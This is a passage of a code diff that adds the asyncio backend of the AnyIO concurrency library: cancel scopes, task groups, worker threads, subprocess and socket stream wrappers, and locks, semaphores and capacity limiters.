is not None + ): + origin._pending_uncancellations += 1 + + # Deliver cancellation to child scopes that aren't shielded or running their own + # cancellation callbacks + for scope in self._child_scopes: + if not scope._shield and not scope.cancel_called: + should_retry = scope._deliver_cancellation(origin) or should_retry + + # Schedule another callback if there are still tasks left + if origin is self: + if should_retry: + self._cancel_handle = get_running_loop().call_soon( + self._deliver_cancellation, origin + ) + else: + self._cancel_handle = None + + return should_retry + + def _restart_cancellation_in_parent(self) -> None: + """ + Restart the cancellation effort in the closest directly cancelled parent scope. + + """ + scope = self._parent_scope + while scope is not None: + if scope._cancel_called: + if scope._cancel_handle is None: + scope._deliver_cancellation(scope) + + break + + # No point in looking beyond any shielded scope + if scope._shield: + break + + scope = scope._parent_scope + + def cancel(self, reason: str | None = None) -> None: + if not self._cancel_called: + if self._timeout_handle: + self._timeout_handle.cancel() + self._timeout_handle = None + + self._cancel_called = True + self._cancel_reason = f"Cancelled via cancel scope {id(self):x}" + if task := current_task(): + self._cancel_reason += f" by {task}" + + if reason: + self._cancel_reason += f"; reason: {reason}" + + if self._host_task is not None: + self._deliver_cancellation(self) + + @property + def deadline(self) -> float: + return self._deadline + + @deadline.setter + def deadline(self, value: float) -> None: + self._deadline = float(value) + if self._timeout_handle is not None: + self._timeout_handle.cancel() + self._timeout_handle = None + + if self._active and not self._cancel_called: + self._timeout() + + @property + def cancel_called(self) -> bool: + return self._cancel_called + + @property + def cancelled_caught(self) -> bool: + return self._cancelled_caught + + @property + def shield(self) -> bool: + return self._shield + + @shield.setter + def shield(self, value: bool) -> None: + if self._shield != value: + self._shield = value + if not value: + self._restart_cancellation_in_parent() + + +# +# Task states +# + + +class TaskState: + """ + Encapsulates auxiliary task information that cannot be added to the Task instance + itself because there are no guarantees about its implementation. + """ + + __slots__ = "parent_id", "cancel_scope", "__weakref__" + + def __init__(self, parent_id: int | None, cancel_scope: CancelScope | None): + self.parent_id = parent_id + self.cancel_scope = cancel_scope + + +_task_states: WeakKeyDictionary[asyncio.Task, TaskState] = WeakKeyDictionary() + + +# +# Task groups +# + + +class _AsyncioTaskStatus(abc.TaskStatus): + def __init__(self, future: asyncio.Future, parent_id: int): + self._future = future + self._parent_id = parent_id + + def started(self, value: T_contra | None = None) -> None: + try: + self._future.set_result(value) + except asyncio.InvalidStateError: + if not self._future.cancelled(): + raise RuntimeError( + "called 'started' twice on the same task status" + ) from None + + task = cast(asyncio.Task, current_task()) + _task_states[task].parent_id = self._parent_id + + +if sys.version_info >= (3, 12): + _eager_task_factory_code: CodeType | None = asyncio.eager_task_factory.__code__ +else: + _eager_task_factory_code = None + + +class TaskGroup(abc.TaskGroup): + def __init__(self) -> None: + self.cancel_scope: CancelScope = CancelScope() + self._active = False + self._exceptions: list[BaseException] = [] + self._tasks: set[asyncio.Task] = set() + self._on_completed_fut: asyncio.Future[None] | None = None + + async def __aenter__(self) -> TaskGroup: + self.cancel_scope.__enter__() + self._active = True + return self + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + try: + if exc_val is not None: + self.cancel_scope.cancel() + if not isinstance(exc_val, CancelledError): + self._exceptions.append(exc_val) + + loop = get_running_loop() + try: + if self._tasks: + with CancelScope() as wait_scope: + while self._tasks: + self._on_completed_fut = loop.create_future() + + try: + await self._on_completed_fut + except CancelledError as exc: + # Shield the scope against further cancellation attempts, + # as they're not productive (#695) + wait_scope.shield = True + self.cancel_scope.cancel() + + # Set exc_val from the cancellation exception if it was + # previously unset. However, we should not replace a native + # cancellation exception with one raise by a cancel scope. + if exc_val is None or ( + isinstance(exc_val, CancelledError) + and not is_anyio_cancellation(exc) + ): + exc_val = exc + + self._on_completed_fut = None + else: + # If there are no child tasks to wait on, run at least one checkpoint + # anyway + await AsyncIOBackend.cancel_shielded_checkpoint() + + self._active = False + if self._exceptions: + # The exception that got us here should already have been + # added to self._exceptions so it's ok to break exception + # chaining and avoid adding a "During handling of above..." + # for each nesting level. + raise BaseExceptionGroup( + "unhandled errors in a TaskGroup", self._exceptions + ) from None + elif exc_val: + raise exc_val + except BaseException as exc: + if self.cancel_scope.__exit__(type(exc), exc, exc.__traceback__): + return True + + raise + + return self.cancel_scope.__exit__(exc_type, exc_val, exc_tb) + finally: + del exc_val, exc_tb, self._exceptions + + def _spawn( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[Any]], + args: tuple[Unpack[PosArgsT]], + name: object, + task_status_future: asyncio.Future | None = None, + ) -> asyncio.Task: + def task_done(_task: asyncio.Task) -> None: + if sys.version_info >= (3, 14) and self.cancel_scope._host_task is not None: + asyncio.future_discard_from_awaited_by( + _task, self.cancel_scope._host_task + ) + + task_state = _task_states[_task] + assert task_state.cancel_scope is not None + assert _task in task_state.cancel_scope._tasks + task_state.cancel_scope._tasks.remove(_task) + self._tasks.remove(task) + del _task_states[_task] + + if self._on_completed_fut is not None and not self._tasks: + try: + self._on_completed_fut.set_result(None) + except asyncio.InvalidStateError: + pass + + try: + exc = _task.exception() + except CancelledError as e: + while isinstance(e.__context__, CancelledError): + e = e.__context__ + + exc = e + + if exc is not None: + # The future can only be in the cancelled state if the host task was + # cancelled, so return immediately instead of adding one more + # CancelledError to the exceptions list + if task_status_future is not None and task_status_future.cancelled(): + return + + if task_status_future is None or task_status_future.done(): + if not isinstance(exc, CancelledError): + self._exceptions.append(exc) + + if not self.cancel_scope._effectively_cancelled: + self.cancel_scope.cancel() + else: + task_status_future.set_exception(exc) + elif task_status_future is not None and not task_status_future.done(): + task_status_future.set_exception( + RuntimeError("Child exited without calling task_status.started()") + ) + + if not self._active: + raise RuntimeError( + "This task group is not active; no new tasks can be started." + ) + + kwargs = {} + if task_status_future: + parent_id = id(current_task()) + kwargs["task_status"] = _AsyncioTaskStatus( + task_status_future, id(self.cancel_scope._host_task) + ) + else: + parent_id = id(self.cancel_scope._host_task) + + coro = func(*args, **kwargs) + if not iscoroutine(coro): + prefix = f"{func.__module__}." if hasattr(func, "__module__") else "" + raise TypeError( + f"Expected {prefix}{func.__qualname__}() to return a coroutine, but " + f"the return value ({coro!r}) is not a coroutine object" + ) + + name = get_callable_name(func) if name is None else str(name) + loop = asyncio.get_running_loop() + if ( + (factory := loop.get_task_factory()) + and getattr(factory, "__code__", None) is _eager_task_factory_code + and (closure := getattr(factory, "__closure__", None)) + ): + custom_task_constructor = closure[0].cell_contents + task = custom_task_constructor(coro, loop=loop, name=name) + else: + task = create_task(coro, name=name) + + # Make the spawned task inherit the task group's cancel scope + _task_states[task] = TaskState( + parent_id=parent_id, cancel_scope=self.cancel_scope + ) + self.cancel_scope._tasks.add(task) + self._tasks.add(task) + if sys.version_info >= (3, 14) and self.cancel_scope._host_task is not None: + asyncio.future_add_to_awaited_by(task, self.cancel_scope._host_task) + + task.add_done_callback(task_done) + return task + + def start_soon( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[Any]], + *args: Unpack[PosArgsT], + name: object = None, + ) -> None: + self._spawn(func, args, name) + + async def start( + self, func: Callable[..., Awaitable[Any]], *args: object, name: object = None + ) -> Any: + future: asyncio.Future = asyncio.Future() + task = self._spawn(func, args, name, future) + + # If the task raises an exception after sending a start value without a switch + # point between, the task group is cancelled and this method never proceeds to + # process the completed future. That's why we have to have a shielded cancel + # scope here. + try: + return await future + except CancelledError: + # Cancel the task and wait for it to exit before returning + task.cancel() + with CancelScope(shield=True), suppress(CancelledError): + await task + + raise + + +# +# Threads +# + +_Retval_Queue_Type = tuple[Optional[T_Retval], Optional[BaseException]] + + +class WorkerThread(Thread): + MAX_IDLE_TIME = 10 # seconds + + def __init__( + self, + root_task: asyncio.Task, + workers: set[WorkerThread], + idle_workers: deque[WorkerThread], + ): + super().__init__(name="AnyIO worker thread") + self.root_task = root_task + self.workers = workers + self.idle_workers = idle_workers + self.loop = root_task._loop + self.queue: Queue[ + tuple[Context, Callable, tuple, asyncio.Future, CancelScope] | None + ] = Queue(2) + self.idle_since = AsyncIOBackend.current_time() + self.stopping = False + + def _report_result( + self, future: asyncio.Future, result: Any, exc: BaseException | None + ) -> None: + self.idle_since = AsyncIOBackend.current_time() + if not self.stopping: + self.idle_workers.append(self) + + if not future.cancelled(): + if exc is not None: + if isinstance(exc, StopIteration): + new_exc = RuntimeError("coroutine raised StopIteration") + new_exc.__cause__ = exc + exc = new_exc + + future.set_exception(exc) + else: + future.set_result(result) + + def run(self) -> None: + with claim_worker_thread(AsyncIOBackend, self.loop): + while True: + item = self.queue.get() + if item is None: + # Shutdown command received + return + + context, func, args, future, cancel_scope = item + if not future.cancelled(): + result = None + exception: BaseException | None = None + threadlocals.current_cancel_scope = cancel_scope + try: + result = context.run(func, *args) + except BaseException as exc: + exception = exc + finally: + del threadlocals.current_cancel_scope + + if not self.loop.is_closed(): + self.loop.call_soon_threadsafe( + self._report_result, future, result, exception + ) + + del result, exception + + self.queue.task_done() + del item, context, func, args, future, cancel_scope + + def stop(self, f: asyncio.Task | None = None) -> None: + self.stopping = True + self.queue.put_nowait(None) + self.workers.discard(self) + try: + self.idle_workers.remove(self) + except ValueError: + pass + + +_threadpool_idle_workers: RunVar[deque[WorkerThread]] = RunVar( + "_threadpool_idle_workers" +) +_threadpool_workers: RunVar[set[WorkerThread]] = RunVar("_threadpool_workers") + + +# +# Subprocesses +# + + +@dataclass(eq=False) +class StreamReaderWrapper(abc.ByteReceiveStream): + _stream: asyncio.StreamReader + + async def receive(self, max_bytes: int = 65536) -> bytes: + data = await self._stream.read(max_bytes) + if data: + return data + else: + raise EndOfStream + + async def aclose(self) -> None: + self._stream.set_exception(ClosedResourceError()) + await AsyncIOBackend.checkpoint() + + +@dataclass(eq=False) +class StreamWriterWrapper(abc.ByteSendStream): + _stream: asyncio.StreamWriter + _closed: bool = field(init=False, default=False) + + async def send(self, item: bytes) -> None: + await AsyncIOBackend.checkpoint_if_cancelled() + stream_paused = self._stream._protocol._paused # type: ignore[attr-defined] + try: + self._stream.write(item) + await self._stream.drain() + except (ConnectionResetError, BrokenPipeError, RuntimeError) as exc: + # If closed by us and/or the peer: + # * on stdlib, drain() raises ConnectionResetError or BrokenPipeError + # * on uvloop and Winloop, write() eventually starts raising RuntimeError + if self._closed: + raise ClosedResourceError from exc + elif self._stream.is_closing(): + raise BrokenResourceError from exc + + raise + + if not stream_paused: + await AsyncIOBackend.cancel_shielded_checkpoint() + + async def aclose(self) -> None: + self._closed = True + self._stream.close() + await AsyncIOBackend.checkpoint() + + +@dataclass(eq=False) +class Process(abc.Process): + _process: asyncio.subprocess.Process + _stdin: StreamWriterWrapper | None + _stdout: StreamReaderWrapper | None + _stderr: StreamReaderWrapper | None + + async def aclose(self) -> None: + with CancelScope(shield=True) as scope: + if self._stdin: + await self._stdin.aclose() + if self._stdout: + await self._stdout.aclose() + if self._stderr: + await self._stderr.aclose() + + scope.shield = False + try: + await self.wait() + except BaseException: + scope.shield = True + self.kill() + await self.wait() + raise + + async def wait(self) -> int: + return await self._process.wait() + + def terminate(self) -> None: + self._process.terminate() + + def kill(self) -> None: + self._process.kill() + + def send_signal(self, signal: int) -> None: + self._process.send_signal(signal) + + @property + def pid(self) -> int: + return self._process.pid + + @property + def returncode(self) -> int | None: + return self._process.returncode + + @property + def stdin(self) -> abc.ByteSendStream | None: + return self._stdin + + @property + def stdout(self) -> abc.ByteReceiveStream | None: + return self._stdout + + @property + def stderr(self) -> abc.ByteReceiveStream | None: + return self._stderr + + +def _forcibly_shutdown_process_pool_on_exit( + workers: set[Process], _task: object +) -> None: + """ + Forcibly shuts down worker processes belonging to this event loop.""" + child_watcher: asyncio.AbstractChildWatcher | None = None # type: ignore[name-defined] + if sys.version_info < (3, 12): + try: + child_watcher = asyncio.get_event_loop_policy().get_child_watcher() + except NotImplementedError: + pass + + # Close as much as possible (w/o async/await) to avoid warnings + for process in workers.copy(): + if process.returncode is None: + continue + + process._stdin._stream._transport.close() # type: ignore[union-attr] + process._stdout._stream._transport.close() # type: ignore[union-attr] + process._stderr._stream._transport.close() # type: ignore[union-attr] + process.kill() + if child_watcher: + child_watcher.remove_child_handler(process.pid) + + +async def _shutdown_process_pool_on_exit(workers: set[abc.Process]) -> None: + """ + Shuts down worker processes belonging to this event loop. + + NOTE: this only works when the event loop was started using asyncio.run() or + anyio.run(). + + """ + process: abc.Process + try: + await sleep(math.inf) + except asyncio.CancelledError: + workers = workers.copy() + for process in workers: + if process.returncode is None: + process.kill() + + for process in workers: + await process.aclose() + + +# +# Sockets and networking +# + + +class StreamProtocol(asyncio.Protocol): + read_queue: deque[bytes] + read_event: asyncio.Event + write_event: asyncio.Event + exception: Exception | None = None + is_at_eof: bool = False + + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self.read_queue = deque() + self.read_event = asyncio.Event() + self.write_event = asyncio.Event() + self.write_event.set() + cast(asyncio.Transport, transport).set_write_buffer_limits(0) + + def connection_lost(self, exc: Exception | None) -> None: + if exc: + self.exception = BrokenResourceError() + self.exception.__cause__ = exc + + self.read_event.set() + self.write_event.set() + + def data_received(self, data: bytes) -> None: + # ProactorEventloop sometimes sends bytearray instead of bytes + self.read_queue.append(bytes(data)) + self.read_event.set() + + def eof_received(self) -> bool | None: + self.is_at_eof = True + self.read_event.set() + return True + + def pause_writing(self) -> None: + self.write_event = asyncio.Event() + + def resume_writing(self) -> None: + self.write_event.set() + + +class DatagramProtocol(asyncio.DatagramProtocol): + read_queue: deque[tuple[bytes, IPSockAddrType]] + read_event: asyncio.Event + write_event: asyncio.Event + exception: Exception | None = None + + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self.read_queue = deque(maxlen=100) # arbitrary value + self.read_event = asyncio.Event() + self.write_event = asyncio.Event() + self.write_event.set() + + def connection_lost(self, exc: Exception | None) -> None: + self.read_event.set() + self.write_event.set() + + def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None: + addr = convert_ipv6_sockaddr(addr) + self.read_queue.append((data, addr)) + self.read_event.set() + + def error_received(self, exc: Exception) -> None: + self.exception = exc + + def pause_writing(self) -> None: + self.write_event.clear() + + def resume_writing(self) -> None: + self.write_event.set() + + +class SocketStream(abc.SocketStream): + def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol): + self._transport = transport + self._protocol = protocol + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + self._closed = False + + @property + def _raw_socket(self) -> socket.socket: + return self._transport.get_extra_info("socket") + + async def receive(self, max_bytes: int = 65536) -> bytes: + with self._receive_guard: + if ( + not self._protocol.read_event.is_set() + and not self._transport.is_closing() + and not self._protocol.is_at_eof + ): + self._transport.resume_reading() + await self._protocol.read_event.wait() + self._transport.pause_reading() + else: + await AsyncIOBackend.checkpoint() + + try: + chunk = self._protocol.read_queue.popleft() + except IndexError: + if self._closed: + raise ClosedResourceError from None + elif self._protocol.exception: + raise self._protocol.exception from None + else: + raise EndOfStream from None + + if len(chunk) > max_bytes: + # Split the oversized chunk + chunk, leftover = chunk[:max_bytes], chunk[max_bytes:] + self._protocol.read_queue.appendleft(leftover) + + # If the read queue is empty, clear the flag so that the next call will + # block until data is available + if not self._protocol.read_queue: + self._protocol.read_event.clear() + + return chunk + + async def send(self, item: bytes) -> None: + with self._send_guard: + await AsyncIOBackend.checkpoint() + + if self._closed: + raise ClosedResourceError + elif self._protocol.exception is not None: + raise self._protocol.exception + + try: + self._transport.write(item) + except RuntimeError as exc: + if self._transport.is_closing(): + raise BrokenResourceError from exc + else: + raise + + await self._protocol.write_event.wait() + + async def send_eof(self) -> None: + try: + self._transport.write_eof() + except OSError: + pass + + async def aclose(self) -> None: + self._closed = True + if not self._transport.is_closing(): + try: + self._transport.write_eof() + except OSError: + pass + + self._transport.close() + await sleep(0) + self._transport.abort() + + +class _RawSocketMixin: + _receive_future: asyncio.Future | None = None + _send_future: asyncio.Future | None = None + _closing = False + + def __init__(self, raw_socket: socket.socket): + self.__raw_socket = raw_socket + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + @property + def _raw_socket(self) -> socket.socket: + return self.__raw_socket + + def _wait_until_readable(self, loop: asyncio.AbstractEventLoop) -> asyncio.Future: + def callback(f: object) -> None: + del self._receive_future + loop.remove_reader(self.__raw_socket) + + f = self._receive_future = asyncio.Future() + loop.add_reader(self.__raw_socket, f.set_result, None) + f.add_done_callback(callback) + return f + + def _wait_until_writable(self, loop: asyncio.AbstractEventLoop) -> asyncio.Future: + def callback(f: object) -> None: + del self._send_future + loop.remove_writer(self.__raw_socket) + + f = self._send_future = asyncio.Future() + loop.add_writer(self.__raw_socket, f.set_result, None) + f.add_done_callback(callback) + return f + + async def aclose(self) -> None: + if not self._closing: + self._closing = True + if self.__raw_socket.fileno() != -1: + self.__raw_socket.close() + + if self._receive_future: + self._receive_future.set_result(None) + if self._send_future: + self._send_future.set_result(None) + + +class UNIXSocketStream(_RawSocketMixin, abc.UNIXSocketStream): + async def send_eof(self) -> None: + with self._send_guard: + self._raw_socket.shutdown(socket.SHUT_WR) + + async def receive(self, max_bytes: int = 65536) -> bytes: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._receive_guard: + while True: + try: + data = self._raw_socket.recv(max_bytes) + except BlockingIOError: + await self._wait_until_readable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + if not data: + raise EndOfStream + + return data + + async def send(self, item: bytes) -> None: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._send_guard: + view = memoryview(item) + while view: + try: + bytes_sent = self._raw_socket.send(view) + except BlockingIOError: + await self._wait_until_writable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + view = view[bytes_sent:] + + async def receive_fds(self, msglen: int, maxfds: int) -> tuple[bytes, list[int]]: + if not isinstance(msglen, int) or msglen < 0: + raise ValueError("msglen must be a non-negative integer") + if not isinstance(maxfds, int) or maxfds < 1: + raise ValueError("maxfds must be a positive integer") + + loop = get_running_loop() + fds = array.array("i") + await AsyncIOBackend.checkpoint() + with self._receive_guard: + while True: + try: + message, ancdata, flags, addr = self._raw_socket.recvmsg( + msglen, socket.CMSG_LEN(maxfds * fds.itemsize) + ) + except BlockingIOError: + await self._wait_until_readable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + if not message and not ancdata: + raise EndOfStream + + break + + for cmsg_level, cmsg_type, cmsg_data in ancdata: + if cmsg_level != socket.SOL_SOCKET or cmsg_type != socket.SCM_RIGHTS: + raise RuntimeError( + f"Received unexpected ancillary data; message = {message!r}, " + f"cmsg_level = {cmsg_level}, cmsg_type = {cmsg_type}" + ) + + fds.frombytes(cmsg_data[: len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]) + + return message, list(fds) + + async def send_fds(self, message: bytes, fds: Collection[int | IOBase]) -> None: + if not message: + raise ValueError("message must not be empty") + if not fds: + raise ValueError("fds must not be empty") + + loop = get_running_loop() + filenos: list[int] = [] + for fd in fds: + if isinstance(fd, int): + filenos.append(fd) + elif isinstance(fd, IOBase): + filenos.append(fd.fileno()) + + fdarray = array.array("i", filenos) + await AsyncIOBackend.checkpoint() + with self._send_guard: + while True: + try: + # The ignore can be removed after mypy picks up + # https://github.com/python/typeshed/pull/5545 + self._raw_socket.sendmsg( + [message], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fdarray)] + ) + break + except BlockingIOError: + await self._wait_until_writable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + + +class TCPSocketListener(abc.SocketListener): + _accept_scope: CancelScope | None = None + _closed = False + + def __init__(self, raw_socket: socket.socket): + self.__raw_socket = raw_socket + self._loop = cast(asyncio.BaseEventLoop, get_running_loop()) + self._accept_guard = ResourceGuard("accepting connections from") + + @property + def _raw_socket(self) -> socket.socket: + return self.__raw_socket + + async def accept(self) -> abc.SocketStream: + if self._closed: + raise ClosedResourceError + + with self._accept_guard: + await AsyncIOBackend.checkpoint() + with CancelScope() as self._accept_scope: + try: + client_sock, _addr = await self._loop.sock_accept(self._raw_socket) + except asyncio.CancelledError: + # Workaround for https://bugs.python.org/issue41317 + try: + self._loop.remove_reader(self._raw_socket) + except (ValueError, NotImplementedError): + pass + + if self._closed: + raise ClosedResourceError from None + + raise + finally: + self._accept_scope = None + + client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + transport, protocol = await self._loop.connect_accepted_socket( + StreamProtocol, client_sock + ) + return SocketStream(transport, protocol) + + async def aclose(self) -> None: + if self._closed: + return + + self._closed = True + if self._accept_scope: + # Workaround for https://bugs.python.org/issue41317 + try: + self._loop.remove_reader(self._raw_socket) + except (ValueError, NotImplementedError): + pass + + self._accept_scope.cancel() + await sleep(0) + + self._raw_socket.close() + + +class UNIXSocketListener(abc.SocketListener): + def __init__(self, raw_socket: socket.socket): + self.__raw_socket = raw_socket + self._loop = get_running_loop() + self._accept_guard = ResourceGuard("accepting connections from") + self._closed = False + + async def accept(self) -> abc.SocketStream: + await AsyncIOBackend.checkpoint() + with self._accept_guard: + while True: + try: + client_sock, _ = self.__raw_socket.accept() + client_sock.setblocking(False) + return UNIXSocketStream(client_sock) + except BlockingIOError: + f: asyncio.Future = asyncio.Future() + self._loop.add_reader(self.__raw_socket, f.set_result, None) + f.add_done_callback( + lambda _: self._loop.remove_reader(self.__raw_socket) + ) + await f + except OSError as exc: + if self._closed: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + + async def aclose(self) -> None: + self._closed = True + self.__raw_socket.close() + + @property + def _raw_socket(self) -> socket.socket: + return self.__raw_socket + + +class UDPSocket(abc.UDPSocket): + def __init__( + self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol + ): + self._transport = transport + self._protocol = protocol + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + self._closed = False + + @property + def _raw_socket(self) -> socket.socket: + return self._transport.get_extra_info("socket") + + async def aclose(self) -> None: + self._closed = True + if not self._transport.is_closing(): + self._transport.close() + + async def receive(self) -> tuple[bytes, IPSockAddrType]: + with self._receive_guard: + await AsyncIOBackend.checkpoint() + + # If the buffer is empty, ask for more data + if not self._protocol.read_queue and not self._transport.is_closing(): + self._protocol.read_event.clear() + await self._protocol.read_event.wait() + + try: + return self._protocol.read_queue.popleft() + except IndexError: + if self._closed: + raise ClosedResourceError from None + else: + raise BrokenResourceError from None + + async def send(self, item: UDPPacketType) -> None: + with self._send_guard: + await AsyncIOBackend.checkpoint() + await self._protocol.write_event.wait() + if self._closed: + raise ClosedResourceError + elif self._transport.is_closing(): + raise BrokenResourceError + else: + self._transport.sendto(*item) + + +class ConnectedUDPSocket(abc.ConnectedUDPSocket): + def __init__( + self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol + ): + self._transport = transport + self._protocol = protocol + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + self._closed = False + + @property + def _raw_socket(self) -> socket.socket: + return self._transport.get_extra_info("socket") + + async def aclose(self) -> None: + self._closed = True + if not self._transport.is_closing(): + self._transport.close() + + async def receive(self) -> bytes: + with self._receive_guard: + await AsyncIOBackend.checkpoint() + + # If the buffer is empty, ask for more data + if not self._protocol.read_queue and not self._transport.is_closing(): + self._protocol.read_event.clear() + await self._protocol.read_event.wait() + + try: + packet = self._protocol.read_queue.popleft() + except IndexError: + if self._closed: + raise ClosedResourceError from None + else: + raise BrokenResourceError from None + + return packet[0] + + async def send(self, item: bytes) -> None: + with self._send_guard: + await AsyncIOBackend.checkpoint() + await self._protocol.write_event.wait() + if self._closed: + raise ClosedResourceError + elif self._transport.is_closing(): + raise BrokenResourceError + else: + self._transport.sendto(item) + + +class UNIXDatagramSocket(_RawSocketMixin, abc.UNIXDatagramSocket): + async def receive(self) -> UNIXDatagramPacketType: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._receive_guard: + while True: + try: + data = self._raw_socket.recvfrom(65536) + except BlockingIOError: + await self._wait_until_readable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + return data + + async def send(self, item: UNIXDatagramPacketType) -> None: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._send_guard: + while True: + try: + self._raw_socket.sendto(*item) + except BlockingIOError: + await self._wait_until_writable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + return + + +class ConnectedUNIXDatagramSocket(_RawSocketMixin, abc.ConnectedUNIXDatagramSocket): + async def receive(self) -> bytes: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._receive_guard: + while True: + try: + data = self._raw_socket.recv(65536) + except BlockingIOError: + await self._wait_until_readable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + return data + + async def send(self, item: bytes) -> None: + loop = get_running_loop() + await AsyncIOBackend.checkpoint() + with self._send_guard: + while True: + try: + self._raw_socket.send(item) + except BlockingIOError: + await self._wait_until_writable(loop) + except OSError as exc: + if self._closing: + raise ClosedResourceError from None + else: + raise BrokenResourceError from exc + else: + return + + +_read_events: RunVar[dict[int, asyncio.Future[bool]]] = RunVar("read_events") +_write_events: RunVar[dict[int, asyncio.Future[bool]]] = RunVar("write_events") + + +# +# Synchronization +# + + +class Event(BaseEvent): + def __new__(cls) -> Event: + return object.__new__(cls) + + def __init__(self) -> None: + self._event = asyncio.Event() + + def set(self) -> None: + self._event.set() + + def is_set(self) -> bool: + return self._event.is_set() + + async def wait(self) -> None: + if self.is_set(): + await AsyncIOBackend.checkpoint() + else: + await self._event.wait() + + def statistics(self) -> EventStatistics: + return EventStatistics(len(self._event._waiters)) + + +class Lock(BaseLock): + def __new__(cls, *, fast_acquire: bool = False) -> Lock: + return object.__new__(cls) + + def __init__(self, *, fast_acquire: bool = False) -> None: + self._fast_acquire = fast_acquire + self._owner_task: asyncio.Task | None = None + self._waiters: deque[tuple[asyncio.Task, asyncio.Future]] = deque() + + async def acquire(self) -> None: + task = cast(asyncio.Task, current_task()) + if self._owner_task is None and not self._waiters: + await AsyncIOBackend.checkpoint_if_cancelled() + self._owner_task = task + + # Unless on the "fast path", yield control of the event loop so that other + # tasks can run too + if not self._fast_acquire: + try: + await AsyncIOBackend.cancel_shielded_checkpoint() + except CancelledError: + self.release() + raise + + return + + if self._owner_task == task: + raise RuntimeError("Attempted to acquire an already held Lock") + + fut: asyncio.Future[None] = asyncio.Future() + item = task, fut + self._waiters.append(item) + try: + await fut + except CancelledError: + self._waiters.remove(item) + if self._owner_task is task: + self.release() + + raise + + self._waiters.remove(item) + + def acquire_nowait(self) -> None: + task = cast(asyncio.Task, current_task()) + if self._owner_task is None and not self._waiters: + self._owner_task = task + return + + if self._owner_task is task: + raise RuntimeError("Attempted to acquire an already held Lock") + + raise WouldBlock + + def locked(self) -> bool: + return self._owner_task is not None + + def release(self) -> None: + if self._owner_task != current_task(): + raise RuntimeError("The current task is not holding this lock") + + for task, fut in self._waiters: + if not fut.cancelled(): + self._owner_task = task + fut.set_result(None) + return + + self._owner_task = None + + def statistics(self) -> LockStatistics: + task_info = AsyncIOTaskInfo(self._owner_task) if self._owner_task else None + return LockStatistics(self.locked(), task_info, len(self._waiters)) + + +class Semaphore(BaseSemaphore): + def __new__( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> Semaphore: + return object.__new__(cls) + + def __init__( + self, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ): + super().__init__(initial_value, max_value=max_value) + self._value = initial_value + self._max_value = max_value + self._fast_acquire = fast_acquire + self._waiters: deque[asyncio.Future[None]] = deque() + + async def acquire(self) -> None: + if self._value > 0 and not self._waiters: + await AsyncIOBackend.checkpoint_if_cancelled() + self._value -= 1 + + # Unless on the "fast path", yield control of the event loop so that other + # tasks can run too + if not self._fast_acquire: + try: + await AsyncIOBackend.cancel_shielded_checkpoint() + except CancelledError: + self.release() + raise + + return + + fut: asyncio.Future[None] = asyncio.Future() + self._waiters.append(fut) + try: + await fut + except CancelledError: + try: + self._waiters.remove(fut) + except ValueError: + self.release() + + raise + + def acquire_nowait(self) -> None: + if self._value == 0: + raise WouldBlock + + self._value -= 1 + + def release(self) -> None: + if self._max_value is not None and self._value == self._max_value: + raise ValueError("semaphore released too many times") + + for fut in self._waiters: + if not fut.cancelled(): + fut.set_result(None) + self._waiters.remove(fut) + return + + self._value += 1 + + @property + def value(self) -> int: + return self._value + + @property + def max_value(self) -> int | None: + return self._max_value + + def statistics(self) -> SemaphoreStatistics: + return SemaphoreStatistics(len(self._waiters)) + + +class CapacityLimiter(BaseCapacityLimiter): + _total_tokens: float = 0 + + def __new__(cls, total_tokens: float) -> CapacityLimiter: + return object.__new__(cls) + + def __init__(self, total_tokens: float): + self._borrowers: set[Any] = set() + self._wait_queue: OrderedDict[Any, asyncio.Event] = OrderedDict() + self.total_tokens = total_tokens + + async def __aenter__(self) -> None: + await self.acquire() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.release() + + @property + def total_tokens(self) -> float: + return self._total_tokens + + @total_tokens.setter + def total_tokens(self, value: float) -> None: + if not isinstance(value, int) and not math.isinf(value): + raise TypeError("total_tokens must be an int or math.inf") + + if value < 0: + raise ValueError("total_tokens must be >= 0") + + waiters_to_notify = max(value - self._total_tokens, 0) + self._total_tokens = value + + # Notify waiting tasks that they have acquired the limiter + while self._wait_queue and waiters_to_notify: + event = self._wait_queue.popitem(last=False)[1] + event.set() + waiters_to_notify -= 1 + + @property + def borrowed_tokens(self) -> int: + return 